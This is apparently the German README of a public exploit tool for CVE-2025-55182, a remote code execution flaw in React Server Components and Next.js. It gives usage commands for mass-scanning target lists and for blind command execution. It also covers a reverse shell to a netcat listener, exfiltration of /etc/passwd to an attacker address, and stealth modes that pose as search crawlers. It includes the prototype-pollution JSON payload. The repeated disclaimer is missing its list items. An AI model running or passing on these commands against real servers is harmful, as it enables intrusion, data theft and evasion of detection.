
CVE-2025-55182 React Server Components – Remote Code Execution Exploit-Tool
CVE-2025-55182 ist eine kritische Sicherheitslücke zur Remote-Codeausführung (RCE) in React Server Components (RSC), die Next.js-Anwendungen mit App Router und Server Actions betrifft.
Die Schwachstelle existiert im Deserialisierungsprozess des Flight-Protokolls und ermöglicht es Angreifern, durch Prototypen-Verschmutzung beliebigen Code auszuführen.
NUR FÜR AUTORISIERTE SICHERHEITSTESTS
Dieses Tool dient ausschließlich zu Bildungs- und autorisierten Penetrationstestzwecken. Unautorisierter Zugriff auf Computersysteme ist illegal. Jegliche illegale oder nicht autorisierte Nutzung dieses Tools liegt in der alleinigen Verantwortung des Benutzers. Der Autor übernimmt keinerlei Haftung.
Bitte lesen Sie die vollständige DISCLAIMER.md, bevor Sie dieses Tool verwenden.
Durch die Nutzung dieses Tools erklären Sie sich damit einverstanden, dass:
| Komponente | Betroffene Versionen |
|---|---|
react-server-dom-webpack | 19.0.0 - 19.2.0 |
| Next.js | 15.x, 16.x (App Router + Server Actions) |
# Repository klonen
git clone https://github.com/Spritualkb/CVE-2025-55182-exp.git
cd CVE-2025-55182-exp
# Abhängigkeiten installieren
pip install requests
pip install requests[socks] # Für SOCKS5-Proxy-Unterstützung
python3 exploit.py http://target:3000 --check
# Einfacher Batch-Scan
python3 exploit.py -f targets.txt --check
# Mit Stealth-Modus und Verzögerung
python3 exploit.py -f targets.txt --check --stealth crawler --delay 2
# Anfällige Ziele in Datei speichern
python3 exploit.py -f targets.txt --check -o vulnerable.txt
python3 exploit.py http://target:3000 -c "id"
# Zuerst Listener starten
nc -lvnp 4444
# Reverse Shell ausführen
python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444
# Listener starten
nc -lvnp 4444
# Befehl ausführen und Ausgabe exfiltrieren
python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444
python3 exploit.py http://target:3000 --check --proxy socks5://127.0.0.1:1080
| Modus | Beschreibung |
|---|---|
browser | Imitiert echte Browser-Anfragen (Standard) |
crawler | Imitiert Suchmaschinen-Crawler (Googlebot, Baiduspider, etc.) |
security | Verwendet User-Agents von Sicherheits-Scannern |
| Option | Beschreibung |
|---|---|
target | Ziel-URL (z.B. http://localhost:3000) |
-f, --file | Datei mit Ziel-URLs (eine pro Zeile) |
-o, --output | Ausgabedatei für anfällige Ziele |
-c, --command | Auszuführender Befehl (blind) |
--check | Prüft auf Schwachstelle |
--proxy | SOCKS5-Proxy (z.B. socks5://127.0.0.1:1080) |
--stealth | Stealth-Modus: browser, crawler, security |
--delay | Verzögerung zwischen Anfragen in Sekunden |
--variants | Mehrere Payload-Varianten für gründliche Prüfung verwenden |
--revshell IP PORT | Reverse Shell an IP:PORT |
--exfil CMD IP PORT | Befehl ausführen und Ausgabe per POST an IP:PORT senden |
-t, --timeout | Timeout für Anfragen in Sekunden (Standard: 15) |
Der Exploit nutzt Prototypen-Verschmutzung in der Deserialisierung des Flight-Protokolls:
Object.prototype.then über "$1:__proto__:then"_formData.get auf den Function-Konstruktor über "$1:constructor:constructor"_prefix, der an Function() übergeben wird{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "<malicious_code>",
"_chunks": "$Q2",
"_formData": {"get": "$1:constructor:constructor"}
}
}
CVE-2025-55182-exp/
├── exploit.py # Haupt-Exploit-Skript
├── targets.txt # Liste der Ziel-URLs (eine pro Zeile)
└── README.md # Diese Datei
# Kommentare beginnen mit #
http://target1.com:3000
https://target2.com
target3.com:3000
react-server-dom-webpack und Next.jsDieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE-Datei für Details.
Durch Herunterladen, Kopieren, Installieren oder Verwenden dieser Software erklären Sie sich mit den Bedingungen dieses Haftungsausschlusses einverstanden.
Dieses Tool ist ausschließlich für folgende Zwecke bestimmt:
Sie dürfen dieses Tool NICHT für Folgendes verwenden:
DIESE SOFTWARE WIRD "WIE BESEHEN" OHNE JEGLICHE AUSDRÜCKLICHE ODER STILLSCHWEIGENDE GEWÄHRLEISTUNG BEREITGESTELLT. DER AUTOR LEHNT ALLE GEWÄHRLEISTUNGEN AB, EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF:
IN KEINEM FALL HAFTET DER AUTOR FÜR IRGENDWELCHE:
Der Benutzer übernimmt die volle Verantwortung für:
Durch die Nutzung dieses Tools bestätigen Sie, dass:
Durch Herunterladen, Kopieren, Installieren oder Verwenden dieser Software erklären Sie sich mit den Bedingungen dieses Haftungsausschlusses einverstanden.
Dieses Tool ist ausschließlich für folgende Zwecke bestimmt:
Sie dürfen dieses Tool NICHT für Folgendes verwenden:
DIESE SOFTWARE WIRD "WIE BESEHEN" OHNE JEGLICHE AUSDRÜCKLICHE ODER STILLSCHWEIGENDE GEWÄHRLEISTUNG BEREITGESTELLT. DER AUTOR LEHNT ALLE GEWÄHRLEISTUNGEN AB, EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF:
IN KEINEM FALL HAFTET DER AUTOR FÜR IRGENDWELCHE:
Der Benutzer übernimmt die volle Verantwortung für:
Durch die Nutzung dieses Tools bestätigen Sie, dass:
Vor der Durchführung von Sicherheitstests müssen Sie:
⚠️ Unautorisierter Computerzugriff ist eine Straftat ⚠️
⚠️ Unauthorisierter Computerzugriff ist eine Straftat ⚠️